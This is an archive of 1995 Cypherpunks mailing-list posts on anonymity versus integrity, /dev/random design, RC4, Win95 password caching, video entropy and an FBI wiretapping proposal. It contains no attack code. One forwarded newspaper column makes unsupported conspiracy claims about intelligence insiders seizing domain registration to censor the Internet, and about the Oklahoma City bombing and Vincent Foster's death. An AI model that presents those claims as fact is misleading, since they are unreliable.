> > have been convinced for some time that you can't have both integrity and
> > anonymity.  
> 
> What's your working definition of "integrity" in this context ?

Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
	2) A state of being unimpaired; soundness.
	3) The quality or condition of being whole or undivided; soundness
	Also) soundness, completeness,
Alternatively:
	1) Strict personal honesty and independence...
	2) Completeness; unity...
	3) The state of being unimpaired; soundness...''

In this context, I might be misinterpreted as having meant that it is
impossible to have both integrity and anonymity.  That is not what I
meant, although it is probably also true in a very strict sense.

To clarify, I don't think you can assure integrity when you have anonymity.

This follows from my earlier writings (circa 1984-89), which are fairly
extensive, and in which I made the only marginally supported claim that
you can't have (i.e., assure) both integrity and secrecy in a system
with sharing.  This came originally from the result that integrity +
secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
which was extended into a POset which characterizes the extent to which
integrity and secrecy can be maintained based on transitive information
flow.

The less mathematical reasoning is that in order to be able to verify
integrity, you have to be able to examine the information that is
secret, while having secrecy requires that you not be able to have
independent verification.  Thus the two limit each other. 

Anonymity, in this copntext, can be thought of as secrecy.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Thu, 2 Nov 1995 07:42:17 +0800
To: cypherpunks@toad.com
Subject: Re: "Dr." Fred
In-Reply-To: <199511010235.DAA00908@utopia.hacktic.nl>
Message-ID: <478lic$vv@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511010235.DAA00908@utopia.hacktic.nl>,
Anonymous <anon-remailer@utopia.hacktic.nl> wrote:
> The difference, of course, is that its almost impossible
> to have sympathy for Dr. Fred. His hustle is for a hell
> of a lot more than subsistence. He was also never actually
> a master of his field, a fact that becomes increasingly
> obvious as our exposure to him goes on. Now he's reduced
> himself to trying to collect someone else's winnings.

So, what part of your analogy was valid?
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 2 Nov 1995 10:32:40 +0800
To: Mike_Spreitzer.PARC@xerox.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <95Oct31.094528pst."14855(1)"@alpha.xerox.com>
Message-ID: <m0tAoYD-0009yxC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


Besides non-blocking, it's very useful sometimes to support SIGIO/SIGURG for
as many devices as possible.

I know only too well that Sybase CT_lib uses this for Async mode.
(I just tracked down what appears to be an HPUX process group bug preventing
 the signals from being delivered...)

In any case, using SIGIO is a whole parallel method to using a select loop,
and although it seemed like a hack when I found out they were using it, it
has some elegance since they chain to other possible signal handlers in
case other io descriptors are ready.

> Blocking vs. non-blocking is a standard issue in design of U*X devices.
> Standard solution: make it block by default, and accept an IOCTL to put it in
> non-blocking mode.  There's even a POSIX way to do this:
> 
> 	flags_or_err = fcntl(fd, F_GETFL, 0);
> 	{check for error}
> 	res = fcntl(fd, F_SETFL, flags_or_err | O_NONBLOCK);
> 	{check for error}

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@mediacity.com (Norman Hardy)
Date: Thu, 2 Nov 1995 22:14:48 +0800
To: cypherpunks@toad.com
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
Message-ID: <acbe05a801021004ca84@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Stanford University Book Store (om compus) has a bunch at about $49.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 2 Nov 1995 14:30:40 +0800
To: baldwin <baldwin@RSA.COM>
Subject: Re: Rivest on the Design of RC4
In-Reply-To: <9510018152.AA815247765@snail.rsa.com>
Message-ID: <Pine.SUN.3.91.951101214900.28122A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


>         Professor Ron Rivest will be presenting a talk titled
> "The Design of RC4" at the RSA Data Security Conference in San Francisco
> (January 17 to 19).  It should be interesting.

What will the legal status of RC4 be after this talk?  Will RSADSI stop 
claiming that RC4 is still protected as a trade secret, or will everyone 
attending the talk be required to sign NDAs?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 2 Nov 1995 15:21:10 +0800
To: cypherpunks@toad.com
Subject: MD5 of CFS131, hacktic
Message-ID: <199511020513.WAA00191@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Andreas Bogk <andreas@artcom.de>
>Please report any leakage of this software immediately to this list.

>From: Mats Bergstrom <asgaard@sos.sll.se>
>Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz


I diffed 1.3 that CFS that I got from att research. The package arrived
to hacktic intact.

I sent PGP-signed MD5 of 1.3.1 to utopia, but got this back:


>From: Oliver Daudey <traveler@utopia.hacktic.nl>
>Subject: Re: CFS 1.3.1
>Date: Mon, 30 Oct 1995 15:51:10 +0100 (MET)
>
>> I have done an md5 on the new cfs. (Everything after the cutmarks)
>> Here it is. Hope you have it soon...
>> 
>> 262b4c6fbec7c729e3e10292f5ea8afb cfs.1.3.1
>> 
>> Don
>
>Sorry, but I need something which is certified with the SSH distribution-
>key (keyID DCB9AE01).



Hmmmm ok. Well, I'll sign it again, for you Cpunks. If you get a different
MD5 (this is everything AFTER the cutmarks) we can diff it.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMJhTJcLa+QKZS485AQHsIwL/fkh8d39uW8M7Fo/slO6Rbb42j7tneqz2
wcePuYqyjGFN93IfjPI0ew1jjNqnzI+je6C0dBhk4eTjN7xAFczTqe1U6+yAKZX5
DnX2waPV/i8Pva0NB0t5lzRfCaB1OM/r
=8IC6
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 2 Nov 1995 12:28:45 +0800
To: hallam@w3.org
Subject: IETF on the web.
In-Reply-To: <9511020101.AA05060@zorch.w3.org>
Message-ID: <Pine.3.89.9511012227.A48583-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 1 Nov 1995 hallam@w3.org wrote:

> email alone is past. I wish I could persuade more people in the IETF
> that the Web infrastructure could provide a valuable assistance

Have you tried <www.ietf.org> ? Seems to have all the relevant links,
Perry's stuff included.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@networking.stanford.edu (Rich Graves)
Date: Thu, 2 Nov 1995 14:55:54 +0800
To: unicorn@holly.ACNS.ColoState.EDU (Scott McCormack)
Subject: Re: Win95 password caching
In-Reply-To: <478rbq$o31@yuma.ACNS.ColoState.EDU>
Message-ID: <199511020642.WAA17156@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
csu.windows95,
comp.os.ms-windows.win95.misc,comp.os.ms-windows.win95.setup,comp.security.misc,alt.security,comp.os.ms-windows.networking.misc,comp.os.ms-windows.networking.windows,comp.os.ms-windows.nt.admin.networking)

[A little more context and Message-ID added from the original post;
cross-posted to nt.admin because it will affect some of you, followups
out]

In article <4791l0$4n14@holly.ACNS.ColoState.EDU>,
unicorn@holly.ACNS.ColoState.EDU (Scott McCormack) wrote:

> In article <478rbq$o31@yuma.ACNS.ColoState.EDU>,
> Jim Carlson (jimc@cnr.colostate.edu) wrote:
> : Does anyone know how to stop Win95 from caching the windows password?
> : We are thinking of using Win95 as the client for a student lab and 
> : need to find a way to stop it from caching passwords.  As it is, when
> : you log into a machine for the first time it creates a .pwl file in 
> : your windows directory for each person who logs into windows.  This 
> : is not acceptible for a lab situation.
> :
> : I can turn this off in WfWG by placing the line "passwordcachine=no" 
> : in the system.ini under [NETWORK], but this does not work in Win95.
> :
> : I am running MS networking in Win95, so when you first log into, 
> : windows it asks you to log into the MS Network.  It then comes up with 
> : a second box asking you to enter your Win95 password.  You can enter 
> : a blank password (""), but it still creates a .pwl file and places a
> : line in win.ini.
> 
> Change the password for the login (or when you first login) to a blank 
> line (ie don't enter a password) and you'll never see that login prompt 
> again. :)

This was not the question. He wants to prevent local Windows passwords
from being created for network-only users. This is a serious security
issue, because if a user enters her real network password for the Windows
password, and someone else later picks up the .PWL files, which are not
encrypted in a particularly secure way, then someone can get unauthorized
access to the network as the previous user(s).

We believe we have found answers in the Registry and in POLEDIT. We've
also turned up another related security bug. When it's confirmed, we'll
post. In the mean time, you can read the last couple messages archived at
gopher://quixote.stanford.edu/1m/win95netbugs.

-rich
 llurch@networking.stanford.edu
 moderator of the win95netbugs list
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 2 Nov 1995 22:15:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <9511020130.AA17317@all.net>
Message-ID: <199511020504.AAA19291@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
> I have been convinced for some time that you can't have both integrity and
> anonymity.  
[and in a followup]
> I might be misinterpreted as having meant that it is impossible to have
> both integrity and anonymity. That is not what I meant, [...]

Er, thanks for the clarification....

> Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
> 	2) A state of being unimpaired; soundness.
> 	3) The quality or condition of being whole or undivided; soundness
> 	Also) soundness, completeness,
> Alternatively:
> 	1) Strict personal honesty and independence...
> 	2) Completeness; unity...
> 	3) The state of being unimpaired; soundness...''
> 
> In this context, I might be misinterpreted as having meant that it is
> impossible to have both integrity and anonymity.  That is not what I
> meant, although it is probably also true in a very strict sense.

All right, what makes you think that ?  Lest we wave our hands too much and
totally misunderstand each other, let me lay down a more concrete scenario.
If you have a substantially different scenario in mind, let me know.

Suppose that I send an anonymous message to a public forum such as this. I
and the message seem to "have anonymity" by any standard I can presently
imagine. Now, in what ways might I or the message lack integrity in this
situation ?  

I haven't broken my personal ethical codes, although perhaps
I've violated someone else's. I have been honest, at least as much as I am
generally honest in anything I write. I am not lying by donning the cloak of
anonymity; I have not misrepresented my identity, merely refused to reveal
it. The content of the message can be considered sound as much as anything
else can. The message is incomplete in the sense that it does not include
the true identity of the author -- is this what you would claim as a
failure of integrity ?  All messages are incomplete in the sense that
various important facts are absent from them.

> To clarify, I don't think you can assure integrity when you have anonymity.
> 
> This follows from my earlier writings (circa 1984-89), which are fairly
> extensive, and in which I made the only marginally supported claim that
> you can't have (i.e., assure) both integrity and secrecy in a system
> with sharing.  This came originally from the result that integrity +
> secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
> which was extended into a POset which characterizes the extent to which
> integrity and secrecy can be maintained based on transitive information
> flow.
> 
> The less mathematical reasoning is that in order to be able to verify
> integrity, you have to be able to examine the information that is
> secret, while having secrecy requires that you not be able to have
> independent verification.  Thus the two limit each other. 
> 
> Anonymity, in this copntext, can be thought of as secrecy.

I understand the nature of the information flow argument, but I don't see
that it's applicable. You appear to contend that the assurance of the
integrity of an anonymous message depends upon the examination of
information that is "secret", that is, _not part of the message_. But no
message is complete -- all messages have many such associated "secrets" not
available as part of the messages. So the claim seems to be vacuous: we
can assure the integrity of neither anonymous nor verinymous messages.

Perhaps the rejoinder will be that anonymous messages have a 
_characteristic_ piece of missing "secret" information, namely the senders'
True Names. But you have yet to offer any argument that only certain special
"secrets" must be examined in order to verify integrity.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 2 Nov 1995 15:46:04 +0800
To: cypherpunks@toad.com
Subject: Re: Video as a source of randomness
Message-ID: <acbdb0df0002100432a7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:02 AM 11/2/95, Andrew D. Isaacson wrote:
>A thought just occurred to me...
>
>How useful would it be to use a video stream as a source of random input
>to something like /dev/random?  I'm thinking along the lines of a
>Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
>It seems to me that the picture recieved by a camera sitting atop a
>monitor would be quite unpredictable. (relatively) High bandwith, too.
>Even if the entropy in a video signal is low, the high bandwidth would
>seem to make up for it.
>
>Struggling to keep my head above the crypto tide,

Digitized video input, especially from something like a noisy channel (t.v.
channel, for example), is quite likely to produce a lot more entropy bits
per second than nearly any of us ever need. (One's PGP key could be seeded
in a fraction of a millisecond, for example.)

The issue is that most people don't need this number of entropy bits per
second, and that most people don't have video inputs. (And those that do
may not have them hooked up and ready to go.) One of the basic ideas we
have had, as Cypherpunks, is to encourage widespread methods. Any methods
that need special hardware tend to not get widely used.

Audio, video, disk timing, and all sorts of other sources of physical
randomness are useful to have, but most people either won't have the right
configuration or won't configure their systems so as to use their
configuration.

--Tim May, who has both audio and video digitizers built into his Power
Macintosh 7100av, but notes that none of the crypto programs he uses has
any provision for using them, and so he doesn't use them for crypto
purposes.

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 6 Nov 1995 02:03:06 +0800
To: cypherpunks@toad.com
Subject: censored? corrected
Message-ID: <199511020847.AAA10833@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


NOTE: More than 8 hours have passed since I sent this text in plaintext
directly to Cypherpunks without its being posted, so in this attempt I am
sending it encrypted through ALUMNI remailer. - Gary Jeffers
gjeffers@socketis.net


                    INFO BLACKOUT

 From THE SPOTLIGHT newspaper's TECHNOLOGY & LIBERTY column by Clark
Matthews - Nov. 06, 1995 issue.

   Powerful national security insiders have established effective control
over the entrance gateways to Internet. Disturbing signs are now emerging
that the "information superhighway" has been targeted for systematic sur-
veillance and political dossier-building on Americans' opinions.

   This ominous news came in the first of a series of articles by investi-
gative journalist Steven Pizzo in WEB REVIEW, an online magazine of cyber-
culture and politics (http://gnn.com/wr/) published by Songline Studios of
San Francisco. Pizzo is the author of INSIDE JOB, a groundbreaking expose'
on the massive fraud and theft of insured deposits in 1980s savings and
loan debacle.

   According to Pizzo, control of Internet "domain name registration" has
passed into private hands-with the potential for serious mischief or
worse. "Domain names" are the odd looking identifying names that are as-
signed to individual computer systems that compose the Internet (logoplex.
com, for example).

   Through a complex chain of licensing arrangements and corporate acqui-
sitions detailed in Pizzo's article, this crucial control over Internet
domain names has passed from the non-profit National Science Foundation to
Network Solutions, Inc. (NSI) of Herndon, Virginia. Last May, amid growing
public disbelief of Establishment media reports about the Oklahoma City
bombing provocation, NSI was purchased by Scientific Applications Interna-
tional Corporation (SAIC) of San Diego.

   SAIC is a $2 billion defense and FBI contractor with a board of direc-
tors that reads like a Who's Who of the intelligence community. Board
members include Admiral Bobby Ray Inman, the former director of the Na-
tional Security Agency (NSA) and deputy director of the CIA; Melvin Laird,
defense secretary under Richard Nixon; Donald Hicks, former head of re-
search & development for the Pentagon; Donald Kerr, former head of the Los
Alamos National Laboratory; and Gen. Maxwell Thurman (ret.), the commander
of the U.S. invasion of Panama.

   Former members of SAIC's board include Robert Gates, the former CIA
director under George Bush; current CIA director John Deutch; Anita Jones,
Deutch's former Pentagon procurement officer, and William Perry, the pre-
sent secretary of defense.

   The corporation also has a legion of computer network specialists and
an entire division of computer consultants. SAIC currently holds contracts
for re-engineering the Pentagon's information systems, automating the
FBI'S computerized fingerprint identification system, and building a na-
tional criminal history infomation system.

   The Internet is a marvel of computer software technology. It was de-
signed to survive a nuclear attack on the United States-like the Post
Office, it's literally smart enough to find a way to get the mail through,
even if most of the network is missing.

   But control of Internet domain name registration means the ability to
remove troublesome-or outspoken-computer systems from the network. Po-
tentially, this control also confers the power to insinuate "phantom"
domains into the network-for surveillance purposes, for example-or for
real-time, automatic censorship.

   Furthermore, anecdotal evidence gathered by this author suggests that
actual "truth control" is taking place on the 'net now. E-mail messages
with controversial contents-including the details of the SAIC takover of
domain names-have consistently disappeared as they travel across the net-
work. News items concerning the Vincent Foster "suicide" investigation
and allegations of NSA bank spying through compromised Inslaw software are
being quickly and automatically canceled. And the cancellations are not by
by their authors.

CRACKDOWN

   With domain names under the control of secret government insiders, it
is even theoretically possible that large parts of the Internet could be
SHUT DOWN AND SILENCED at critical times. This could be accomplished by
suddenly altering domain name registrations or interposing compromised
"domains" at crucial points.

   These compromised systems could serve as "black holes" at critical
times, stopping e-mail and important news from reaching the world-or the
rest of the country.

   Exercises in "turning the Internet off" have already taken place in
Taiwan and Hong Kong. In Taiwan, the 'net was successfully shut down.
All network traffic-including news, opinions and e-mail sent by computer
users-was successfully "bottled up" on the island and prevented from
reaching the world.

   In Hong Kong, the Internet wasn't quite strangled, but the British
authorities who control that colony managed to throttle free electronic
speech with the rest of the world until everything was bottlenecked into
a few little-known satellite links.

   These are alarming precedents and sure signs that powerful, shadowy
forces are preparing to chop at the very roots of America's new Liberty
Tree. The secretive people on the board of directors of SAIC are intell-
igence professsionals skilled at manufacturing events-and then manufact-
uring public opinion and consent by controlling the truth. Will Internet
disinformation, censorship or "shutdowns" signal the next American crisis?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew D. Isaacson" <adisaacs@mtu.edu>
Date: Thu, 2 Nov 1995 14:27:58 +0800
To: cypherpunks@toad.com
Subject: Video as a source of randomness
Message-ID: <199511020602.BAA23380@supreme.csl.mtu.edu>
MIME-Version: 1.0
Content-Type: text


A thought just occurred to me...

How useful would it be to use a video stream as a source of random input
to something like /dev/random?  I'm thinking along the lines of a
Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
It seems to me that the picture recieved by a camera sitting atop a
monitor would be quite unpredictable. (relatively) High bandwith, too.
Even if the entropy in a video signal is low, the high bandwidth would
seem to make up for it.

Struggling to keep my head above the crypto tide,
andy
-- 
Andrew Isaacson <adisaacs@mtu.edu>    finger adisaacs@colossus.csl.mtu.edu 
Freshman/Comp Sci @ Michigan Technological University   for PGP public key
==========================================================================
"Hi, I'm, I'm, I'm... you'll have to forgive me, I'm terrible with names."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Mon, 6 Nov 1995 02:03:07 +0800
To: cypherpunks@toad.com
Subject: FBI seeks huge wiretapping system
Message-ID: <199511020955.BAA04564@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


In today's San Jose Mercury, online edition. Forgive me if this has already
been passed around.

-=-

FBI seeks huge wiretapping system

BY JOHN MARKOFF

New York Times

The FBI has proposed a national wiretapping system of unprecedented size and
scope that would give law enforcement officials the capacity to monitor
simultaneously as many as one out of every 100 phone lines in some high
crime areas of the country.

Such a surveillance ability would vastly exceed the current needs of law
enforcement officials around the country, who in recent years have conducted
an annual average of less than 850 court-authorized wiretaps -- or fewer
than one in every 174,000 phone lines.

The plan, which needs congressional approval for the money to finance it,
would still require a court warrant to conduct wiretaps. Still, the proposed
expansion of the government's eavesdropping abilities raises questions among
telephone
industry executives as to why the FBI believes it may require such broad
access to the nation's phone network in the future.

And privacy-rights advocates see the specter of a Big Brother surveillance
capability whose very existence might encourage law enforcement officials to
use wiretapping much more frequently as an investigative tool.

``A proposal that envisions some form of electronic surveillance for one of
every 100 telephone lines would be frightening to many people,'' said James
Dempsey, deputy director at the Center for National Security, a public
policy organization in Washington. ``I think law enforcement needs to be
honest with the public about what its intentions are.''

Generally, FBI officials contend that an advanced, high-capacity monitoring
system will be necessary as more of modern life and business -- and crime --
takes place as voice or computer conversations over digital phone lines.

On digital lines, communications are transmitted in electronic pulses
represented by the 1's and 0's of computer code. Such communications are
harder to monitor than with the old-fashioned analog lines in which
conversations are
transmitted as electronic signals corresponding to audible sound waves.

An FBI spokesman declined to elaborate on the bureau's perceived need for
such an expansion of its wiretapping abilities.

``The full implementation is absolutely essential for law enforcement and
public safety,'' said Mike Kortan, an FBI spokesman in Washington. ``We are
in ongoing discussions with the communications industry. Therefore it would be
inappropriate to comment further at this point.''

The plan, which was published in the Federal Register on Oct. 16 but has not
drawn much attention yet outside law enforcement and industry circles, is
the first comprehensive outline by the FBI of the surveillance capabilities
it will require under the controversial Digital Telephony Act that was
signed by President Clinton in 1994.

The law was adopted in the closing hours of the previous Congress after the
administration overcame telephone industry resistance to the extensive
network equipment changes that will be required to permit digital
wiretapping. In order to overcome that opposition, the administration
promised that the government would allocate $500 million to help upgrade
industry networks.

Whether the law will ever go into effect is an open question, because it
requires a federal appropriation, to be paid for out of criminal fines and
penalties, that Congress has not yet authorized. The budget legislation now
pending on Capitol Hill has no proviso for the digital wiretapping money,
although the House budget bill included a wiretapping allocation until last
week.

The House measure was deleted after objections from several freshman
Republicans, including Rep. Bob Barr of Georgia, a former federal
prosecutor, who said that he objected to the way the money for wiretapping
would be raised and that he had concerns about how the FBI might use such a
sweeping surveillance ability.

But some lawmakers say the Clinton administration, which has vowed to veto
the current federal budget bill, saw little point in pushing for inclusion
of the financing for the wiretapping at this time.

And others note that money for the digital wiretapping plan, presented as a
tough anti-crime measure, could be difficult for lawmakers of either party
to oppose outright. The FBI and the Clinton administration are expected to
continue seeking funds in the future.

The scope of the FBI plan has startled telephone industry executives, who
said it was difficult to estimate how much it would ultimately cost to carry
out the capacity increases. The officials are worried, however, that if
federal funds are not forthcoming, the government may attempt to shift the
financing burden to the rates that businesses and consumers pay to use the
telephone network.

``The difficulty in this process is going to come down the road when they
ask us to redesign our entire systems and not pay us,'' said Larry Clinton,
associate vice president for governmental affairs at the U.S. Telephone
Association, an
Washington-based industry lobbying group. ``If they try to make rate payers
pay for this we will run into serious and perhaps even constitutional
problems which we hope to avoid.''

The FBI plan, as filed in the Federal Register, calls for designating each
local telephone as falling under one of three categories. Category I would
be made up of urban areas, where most electronic surveillance currently
takes place. In
these regions, telecommunications carriers would be required to make
available up to 1 percent of their network capacity when sought by
law-enforcement officials.

In lower-crime urban and suburban areas, designated Category II, phone
companies would need to make available up to five-tenths of a percent of
their network lines, while the predominantly rural low-crime Category III
areas would require
0.25 percent.

For many of the most densely populated metropolitan areas, like New York,
Los Angeles and Chicago, there are tens of millions of phone lines. The FBI
document contends that in such places, the demands of digital wiretapping
may make it
necessary to intercept tens of thousands of phone calls at once.

Some industry officials said they were at a loss to understand how the
government expected to make use of such requirements. At an industry
gathering last year, telephone industry executives discussing the Digital
Telephony Act could not think of an example of more than seven wiretaps ever
being run from a single phone company office at any one time, according to
Ron Peat, director of federal legislation analysis for the Pacific Telesis
Group, the San Francisco-based regional Bell company.

Some technology experts said that the FBI's projected needs, which the
bureau said were based on historical records and on demographic data and
market forecasts, reflect a growing belief by law enforcement that
electronic surveillance will rapidly increase in importance in the digital
age, where most communications will take place using an array of mobile
computerized devices.

``These are staggering numbers,'' said Mark Rasch, director of information
security law and policy for Science Applications International Corp. in
McLean, Va. ``Either they do a lot more wiretaps than they now admit, or
they plan
on doing a significant larger number of wiretaps in the future because of
the fear of domestic terrorism.''
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 2 Nov 1995 16:32:23 +0800
To: cypherpunks@toad.com
Subject: Was I censored before Cypherpunks?
Message-ID: <199511021217.GAA09629@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


::
Encrypted: PGP

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

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
